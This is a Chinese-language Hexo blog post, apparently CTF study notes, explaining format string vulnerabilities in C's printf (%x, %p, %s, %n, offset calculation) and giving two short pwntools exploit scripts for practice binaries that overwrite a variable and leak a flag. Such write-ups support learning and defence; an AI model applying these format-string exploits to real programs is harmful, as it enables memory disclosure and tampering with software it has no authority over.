<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="格式化字符串格式化字符串是个按部就班的人，直接打印的时候，不管给没给参数，他会按照参数的规则，打印出字符串中给的格式化字符，不管这个参数危不危险 格式化字符串比较长，不太好直接给printf参数。所以printf中的参数其实是格式化字符串的地址。所以当格式化字符串本身含有某个地址的时候，可以将这个地址的内容打印出来 于是我们顺着这个地址可以找到真正的字符串在哪里，接着计算地址和字符串的偏移量，从而">
<meta property="og:type" content="article">
<meta property="og:title" content="格式化字符串">
<meta property="og:url" content="http://example.com/2024/11/06/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2/index.html">
<meta property="og:site_name" content="Pocon&#39;s Blog">
<meta property="og:description" content="格式化字符串格式化字符串是个按部就班的人，直接打印的时候，不管给没给参数，他会按照参数的规则，打印出字符串中给的格式化字符，不管这个参数危不危险 格式化字符串比较长，不太好直接给printf参数。所以printf中的参数其实是格式化字符串的地址。所以当格式化字符串本身含有某个地址的时候，可以将这个地址的内容打印出来 于是我们顺着这个地址可以找到真正的字符串在哪里，接着计算地址和字符串的偏移量，从而">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20250324134337963.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20250324192033600.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20250324193144647.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20250324195706795.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20250324203251347.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20250324203222059.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20250325211915368.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20250325211004767.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20250325212214657.png">
<meta property="article:published_time" content="2024-11-06T08:56:13.000Z">
<meta property="article:modified_time" content="2025-12-10T07:21:39.081Z">
<meta property="article:author" content="Pocon">
<meta property="article:tag" content="Pwn">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20250324134337963.png">

<link rel="canonical" href="http://example.com/2024/11/06/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>格式化字符串 | Pocon's Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<!-- hexo injector head_end start -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.css">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hexo-math@4.0.0/dist/style.css">
<!-- hexo injector head_end end --></head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Pocon's Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-schedule">

    <a href="/schedule/" rel="section"><i class="fa fa-calendar fa-fw"></i>日程表</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2024/11/06/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Pocon">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Pocon's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          格式化字符串
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2024-11-06 16:56:13" itemprop="dateCreated datePublished" datetime="2024-11-06T16:56:13+08:00">2024-11-06</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2025-12-10 15:21:39" itemprop="dateModified" datetime="2025-12-10T15:21:39+08:00">2025-12-10</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">网络安全</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="格式化字符串"><a href="#格式化字符串" class="headerlink" title="格式化字符串"></a>格式化字符串</h1><p>格式化字符串是个按部就班的人，直接打印的时候，不管给没给参数，他会按照参数的规则，打印出字符串中给的格式化字符，不管这个参数危不危险</p>
<p>格式化字符串比较长，不太好直接给printf参数。所以printf中的参数其实是格式化字符串的地址。所以当格式化字符串本身含有某个地址的时候，可以将这个地址的内容打印出来</p>
<p>于是我们顺着这个地址可以找到真正的字符串在哪里，接着计算地址和字符串的偏移量，从而通过控制格式化字符串达到任意地址读写</p>
<p><strong>格式化字符串存在于栈上，导致我们可以在栈上写入任意数据，导致我们可以泄露任意地址的内存。还可以篡改进程空间中的内容</strong></p>
<p><strong>总之，允许我们任意读写地址上的内容</strong></p>
<p><strong>要求：有printf函数，且函数第一个参数可以控制</strong></p>
<p>%x：将栈上的printf函数的参数以十六进制的形式打印出来。且前方不加0x</p>
<p>%p：将栈上的数据当作指针输出。比起%x多了0x。可以基于此绕过canary</p>
<p>%s： 栈上存放的是字符串的起始位置，解析这个地址，并把内容打印出来直到遇见‘ \0 ’。可以引发字符串截断漏洞。</p>
<p>总之，%x 或 %p 直接把栈上内容打印出来，%s把栈上内容作为指针并把指向的内容打印出来。</p>
<p>由于可以%s解引用，所以这里不再局限于泄露栈上的数据，而是可以泄露任何地址的内存。比如可以泄露got表的内容。</p>
<p>%n：特性和%s相似，可以把栈上的内容看作地址进行解析。但它的作用是向被解析的地址（栈中数据指向的地址）中写入内容 。内容为格式化字符串前方（%n前方）已经打印成功的字符的个数。 输入的数据是一个四字节的整数，也就是int类型。</p>
<p>如果要求写入数据较大的话，可以设置字符宽度。空格也算字符</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">char</span> c =<span class="string">&#x27;a&#x27;</span>;</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;%20c&quot;</span>,c)</span><br></pre></td></tr></table></figure>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;cccc%6hn&quot;</span>)</span><br><span class="line"><span class="comment">//这样会将输入的int类型改为short类型。即输入0x0004</span></span><br><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;cccc%6hhn&quot;</span>)</span><br><span class="line"><span class="comment">//这样可以写入一个字节，0x04</span></span><br></pre></td></tr></table></figure>
<p>（除了泄露还有篡改）</p>
<p><img src="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20250324134337963.png" alt="image-20250324134337963" style="zoom:50%;"></p>
<h4 id="s技巧"><a href="#s技巧" class="headerlink" title="%s技巧"></a>%s技巧</h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;%3$d&quot;</span>,a,b,c);</span><br></pre></td></tr></table></figure>
<p>这时会把第三个参数打印出来</p>
<p>所以当flag距离printf函数很远的时候，这样写就可以了</p>
<p>x86中，这个参数（第一个参数 ，也就是格式化字符串），存放在栈上。所以存放的第一个参数其实是个地址，那么读取第一个参数的时候实际上需要解析。</p>
<h5 id="例子"><a href="#例子" class="headerlink" title="例子"></a>例子</h5><p>我们输入的格式化字符串如下。此时它将解析第六个参数。我们知道格式化字符串存放在栈中，于是可以通过在格式化字符串中写入地址的方式泄露任意地址的内容。图中我们找到地址在栈中的位置，并计算得到距离格式化字符串有8个双字，即是第六个参数。再通过%s打印指定地址的内容。</p>
<p>一般我们通过此得到函数got表地址</p>
<p><img src="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20250324192033600.png" alt="image-20250324192033600" style="zoom:67%;"></p>
<p>（图中字符串不应该出现00，不然会发生字符串截断） </p>
<h5 id="实际例子"><a href="#实际例子" class="headerlink" title="实际例子"></a>实际例子</h5><p>可以看到，格式化字符串被存放在0xffffd1c8中, 第一个参数是0xffffd1bc，也就是格式化字符串的地址。我们可以精心构造格式化字符串，并计算其是第几个参数。</p>
<p><img src="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20250324193144647.png" alt="image-20250324193144647"></p>
<h5 id="例子-1"><a href="#例子-1" class="headerlink" title="例子"></a>例子</h5><p>这样就会将0x80522004的内容修改为4</p>
<p><img src="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20250324195706795.png" alt="image-20250324195706795" style="zoom:50%;"></p>
<h2 id="例题"><a href="#例题" class="headerlink" title="例题"></a>例题</h2><h3 id="fmtstr1"><a href="#fmtstr1" class="headerlink" title="fmtstr1"></a>fmtstr1</h3><p><img src="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20250324203251347.png" alt="image-20250324203251347" style="zoom:50%;"></p>
<p>可以看到，打印的数据buf是我们自己传递的，完全可控，存在格式化字符串漏洞。</p>
<p>我i们需要设置x的值为4。找到x的地址为0x804a02c，默认值为3</p>
<p>接着进行动态调试，计算参数位置</p>
<p><img src="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20250324203222059.png" alt="image-20250324203222059" style="zoom:67%;"></p>
<p>所以是格式化字符串的第11个参数</p>
<p>计算：(0xddc-0xdb4)  转化为10进制后除以4 并 +1。得到的数为参数的位置。</p>
<p>加1是因为格式化字符串本身算一个参数。格式化字符串的第一个参数是printf的第二个参数……</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(os= <span class="string">&#x27;linux&#x27;</span>, arch = <span class="string">&#x27;i386&#x27;</span>)</span><br><span class="line"></span><br><span class="line">io = process(<span class="string">&quot;./fmtstr1&quot;</span>)</span><br><span class="line">x_addr = <span class="number">0x0804a02c</span></span><br><span class="line"><span class="comment">#the distance between fmtstr and the first parameter is 0x28 (40)</span></span><br><span class="line"></span><br><span class="line">fmtstr_payload = p32(x_addr) + <span class="string">b&#x27;%11$n&#x27;</span></span><br><span class="line"></span><br><span class="line">io.sendline(fmtstr_payload)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>
<h3 id="frmstr2"><a href="#frmstr2" class="headerlink" title="frmstr2"></a>frmstr2</h3><p>发现是64位程序</p>
<p><img src="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20250325211915368.png" alt="image-20250325211915368"></p>
<p>需要输入正确的flag，这样就会给flag。。。</p>
<p>同样格式化字符串，考虑用%s泄露flag</p>
<p>题中可以看到，从文件读取到的flag数组储存在栈上</p>
<p><img src="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20250325211004767.png" alt="image-20250325211004767" style="zoom: 50%;"></p>
<p>m的意思是动态分配内存空间</p>
<p>使用动态调试</p>
<p>发现写入的格式化字符串存在堆中。但这没有关系，因为我们需要泄露的是栈上的地址。</p>
<p><img src="https://cdn.jsdelivr.net/gh/Pocon041/blogimage@main/image-20250325212214657.png" alt="image-20250325212214657"></p>
<p>回忆一下64位是怎么传递参数的。先将前六个参数传入寄存器中，再读取栈中的数据</p>
<p>第一个参数自然是输入的格式化字符串AAAAAAAA，然后从第下面开始是第七个参数。所以flag是第九个参数。实战中也可以通过连续输入大量%p来找到对应参数偏移</p>
<h3 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(os= <span class="string">&#x27;linux&#x27;</span>, arch = <span class="string">&#x27;amd64&#x27;</span>)</span><br><span class="line"></span><br><span class="line">io = process(<span class="string">&quot;./goodluck&quot;</span>)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">b&#x27;%9$s&#x27;</span></span><br><span class="line">io.send(payload)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>
<p>注意是send而不是sendline</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/Pwn/" rel="tag"># Pwn</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2024/11/06/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%B3%BB%E7%BB%9F%E7%BB%93%E6%9E%84/" rel="prev" title="计算机系统结构">
      <i class="fa fa-chevron-left"></i> 计算机系统结构
    </a></div>
      <div class="post-nav-item">
    <a href="/2024/11/06/%E6%8C%87%E4%BB%A4%E7%B3%BB%E7%BB%9F/" rel="next" title="指令系统">
      指令系统 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2"><span class="nav-number">1.</span> <span class="nav-text">格式化字符串</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#s%E6%8A%80%E5%B7%A7"><span class="nav-number">1.0.0.1.</span> <span class="nav-text">%s技巧</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E4%BE%8B%E5%AD%90"><span class="nav-number">1.0.0.1.1.</span> <span class="nav-text">例子</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%AE%9E%E9%99%85%E4%BE%8B%E5%AD%90"><span class="nav-number">1.0.0.1.2.</span> <span class="nav-text">实际例子</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E4%BE%8B%E5%AD%90-1"><span class="nav-number">1.0.0.1.3.</span> <span class="nav-text">例子</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BE%8B%E9%A2%98"><span class="nav-number">1.1.</span> <span class="nav-text">例题</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#fmtstr1"><span class="nav-number">1.1.1.</span> <span class="nav-text">fmtstr1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#frmstr2"><span class="nav-number">1.1.2.</span> <span class="nav-text">frmstr2</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#exp"><span class="nav-number">1.1.3.</span> <span class="nav-text">exp</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Pocon</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">37</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">9</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Pocon</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

  

</body>
</html>
